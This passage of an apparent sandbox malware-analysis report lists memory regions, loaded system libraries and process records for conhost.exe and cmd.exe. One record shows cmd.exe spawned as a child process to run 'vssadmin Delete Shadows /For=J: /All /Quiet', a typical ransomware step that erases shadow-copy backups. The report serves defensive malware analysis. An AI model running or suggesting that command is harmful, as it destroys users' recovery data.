	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 4289
	        start_va = 0x22600000
	          end_va = 0x227fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000022600000"
	        filename = ""

Region:
	              id = 4290
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 4291
	        start_va = 0xd8e25b0000
	          end_va = 0xd8e25effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d8e25b0000"
	        filename = ""

Region:
	              id = 4292
	        start_va = 0xd8e2600000
	          end_va = 0xd8e27fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d8e2600000"
	        filename = ""

Region:
	              id = 4293
	        start_va = 0x2363bd20000
	          end_va = 0x2363bd3ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363bd20000"
	        filename = ""

Region:
	              id = 4294
	        start_va = 0x2363bd40000
	          end_va = 0x2363bd54fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002363bd40000"
	        filename = ""

Region:
	              id = 4295
	        start_va = 0x7df5ff1d0000
	          end_va = 0x7ff5ff1cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff1d0000"
	        filename = ""

Region:
	              id = 4296
	        start_va = 0x7ff7ffcb0000
	          end_va = 0x7ff7ffcd2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ffcb0000"
	        filename = ""

Region:
	              id = 4297
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 4298
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 4299
	        start_va = 0x2363bd60000
	          end_va = 0x2363bfbffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363bd60000"
	        filename = ""

Region:
	              id = 4304
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 4305
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 4306
	        start_va = 0x2363bd20000
	          end_va = 0x2363bd2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002363bd20000"
	        filename = ""

Region:
	              id = 4307
	        start_va = 0x7ff7ffbb0000
	          end_va = 0x7ff7ffcaffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ffbb0000"
	        filename = ""

Region:
	              id = 4308
	        start_va = 0x2363bd60000
	          end_va = 0x2363be1dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4309
	        start_va = 0x2363bec0000
	          end_va = 0x2363bfbffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363bec0000"
	        filename = ""

Region:
	              id = 4317
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 4318
	        start_va = 0xd8e2800000
	          end_va = 0xd8e283ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d8e2800000"
	        filename = ""

Region:
	              id = 4319
	        start_va = 0x2363be20000
	          end_va = 0x2363be3ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363be20000"
	        filename = ""

Region:
	              id = 4320
	        start_va = 0x2363bd30000
	          end_va = 0x2363bd36fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363bd30000"
	        filename = ""

Region:
	              id = 4324
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 4325
	        start_va = 0x2363be20000
	          end_va = 0x2363be20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002363be20000"
	        filename = ""

Region:
	              id = 4326
	        start_va = 0x2363be30000
	          end_va = 0x2363be3ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363be30000"
	        filename = ""

Region:
	              id = 4327
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 4328
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 4329
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 4330
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 4332
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 4333
	        start_va = 0x2363be40000
	          end_va = 0x2363be46fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363be40000"
	        filename = ""

Region:
	              id = 4334
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 4335
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 4336
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 4337
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 4340
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 4349
	        start_va = 0x2363be50000
	          end_va = 0x2363be50fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363be50000"
	        filename = ""

Region:
	              id = 4350
	        start_va = 0x2363be60000
	          end_va = 0x2363be60fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363be60000"
	        filename = ""

Region:
	              id = 4351
	        start_va = 0x2363bfc0000
	          end_va = 0x2363c147fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002363bfc0000"
	        filename = ""

Region:
	              id = 4352
	        start_va = 0x2363c150000
	          end_va = 0x2363c2d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002363c150000"
	        filename = ""

Region:
	              id = 4353
	        start_va = 0x2363c2e0000
	          end_va = 0x2363d6dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002363c2e0000"
	        filename = ""

Region:
	              id = 4354
	        start_va = 0x2363d6e0000
	          end_va = 0x2363d73ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363d6e0000"
	        filename = ""

Region:
	              id = 4385
	        start_va = 0xd8e2840000
	          end_va = 0xd8e287ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d8e2840000"
	        filename = ""

Region:
	              id = 4386
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 4387
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 4388
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 4389
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 4401
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 4402
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 4403
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 4404
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 4405
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 4419
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 4420
	        start_va = 0x2363be70000
	          end_va = 0x2363be7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363be70000"
	        filename = ""

Region:
	              id = 4462
	        start_va = 0x2363d740000
	          end_va = 0x2363da76fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 4463
	        start_va = 0x2363be80000
	          end_va = 0x2363bea0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 4464
	        start_va = 0x2363da80000
	          end_va = 0x2363dad9fff
	       monitored = 1
	     entry_point = 0x2363da953f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 4471
	        start_va = 0x2363da80000
	          end_va = 0x2363dc93fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363da80000"
	        filename = ""

Region:
	              id = 4472
	        start_va = 0x2363dca0000
	          end_va = 0x2363deb9fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363dca0000"
	        filename = ""

Region:
	              id = 4473
	        start_va = 0x2363dec0000
	          end_va = 0x2363dfcbfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363dec0000"
	        filename = ""

Region:
	              id = 4474
	        start_va = 0x2363dfd0000
	          end_va = 0x2363e1e3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363dfd0000"
	        filename = ""

Region:
	              id = 4481
	        start_va = 0x2363e1f0000
	          end_va = 0x2363e2f9fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363e1f0000"
	        filename = ""

Region:
	              id = 4519
	        start_va = 0xd8e2880000
	          end_va = 0xd8e28bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d8e2880000"
	        filename = ""

Region:
	              id = 4520
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 4521
	        start_va = 0x2363be80000
	          end_va = 0x2363be80fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002363be80000"
	        filename = ""

Region:
	              id = 4522
	        start_va = 0x2363e300000
	          end_va = 0x2363e3bbfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002363e300000"
	        filename = ""

Region:
	              id = 4523
	        start_va = 0x2363be80000
	          end_va = 0x2363be83fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002363be80000"
	        filename = ""

Region:
	              id = 4524
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 4527
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 4528
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 4535
	        start_va = 0x2363be90000
	          end_va = 0x2363be96fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363be90000"
	        filename = ""

Region:
	              id = 4536
	        start_va = 0x2363bea0000
	          end_va = 0x2363bea0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002363bea0000"
	        filename = ""

Region:
	              id = 4537
	        start_va = 0x2363beb0000
	          end_va = 0x2363beb0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002363beb0000"
	        filename = ""

Region:
	              id = 4538
	        start_va = 0x2363d6e0000
	          end_va = 0x2363d6e4fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 4539
	        start_va = 0x2363d730000
	          end_va = 0x2363d73ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002363d730000"
	        filename = ""

Region:
	              id = 4543
	        start_va = 0x2363d6f0000
	          end_va = 0x2363d6f0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 4546
	        start_va = 0x2363d700000
	          end_va = 0x2363d701fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002363d700000"
	        filename = ""

Region:
	              id = 4547
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 4548
	        start_va = 0x2363d710000
	          end_va = 0x2363d710fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 4549
	        start_va = 0x2363d720000
	          end_va = 0x2363d721fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002363d720000"
	        filename = ""


Thread:
	id = 325
	os_tid = 0x7d4


Thread:
	id = 328
	os_tid = 0x35c


Thread:
	id = 334
	os_tid = 0x1194


Thread:
	id = 341
	os_tid = 0xd1c


Process:
	id = "58"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x2d388000"
	os_pid = "0x119c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=J: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 4355
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 4356
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 4357
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 4358
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 4359
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 4360
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 4361
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 4362
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 4363
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 4364
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 4365
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 4366
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 4367
	        start_va = 0x7f610000
	          end_va = 0x7f632fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f610000"
	        filename = ""

Region:
	              id = 4368
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 4369
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 4370
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 4371
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 4372
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 4378
	        start_va = 0x1c0000
	          end_va = 0x22ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 4390
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 4391
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 4392
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4393
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 4406
	        start_va = 0x4600000
	          end_va = 0x48bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 4407
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4421
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 4422
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 4423
	        start_va = 0x7f510000
	          end_va = 0x7f60ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f510000"
	        filename = ""

Region:
	              id = 4614
	        start_va = 0x230000
	          end_va = 0x2edfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4615
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 4616
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 4617
	        start_va = 0x220000
	          end_va = 0x22ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000220000"
	        filename = ""

Region:
	              id = 4618
	        start_va = 0x4600000
	          end_va = 0x46fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 4619
	        start_va = 0x47c0000
	          end_va = 0x48bffff
	       monitored = 1
	     entry_point = 0x0
